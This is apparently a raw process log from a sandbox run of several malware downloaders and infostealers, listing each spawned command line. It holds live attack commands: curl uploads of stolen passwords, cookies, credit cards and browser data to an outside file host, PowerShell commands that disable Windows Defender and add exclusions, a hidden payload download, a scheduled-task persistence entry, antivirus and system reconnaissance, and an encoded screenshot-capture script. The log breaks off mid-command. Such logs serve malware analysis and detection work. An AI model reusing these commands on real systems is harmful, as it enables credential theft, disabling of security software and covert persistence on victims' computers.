"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=4764 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=5516 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=5200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=utility --disable-quic --disable-http2 --mojo-platform-channel-handle=3732 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tmp.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tmp.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mode con: cols=125 lines=35
C:\Windows\system32\mode.com
mode con: cols=125 lines=35
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get UUID
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 812297
C:\Windows\SysWOW64\findstr.exe
findstr /V "IndieBeachesHonIo" Janet
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g
C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
812297\Shopzilla.pif 812297\g
C:\Windows\SysWOW64\timeout.exe
timeout 15
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
C:\Windows\system32\taskkill.exe
taskkill /im firefox.exe /t /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile
C:\Users\Admin\AppData\Local\Temp\3076928777.exe
C:\Users\Admin\AppData\Local\Temp\3076928777.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe"
C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 812297
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g
C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
812297\Shopzilla.pif 812297\g
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 15
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe'
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9F7D.tmp\9F7E.tmp\9F7F.bat "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"
C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe
"C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004D8
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 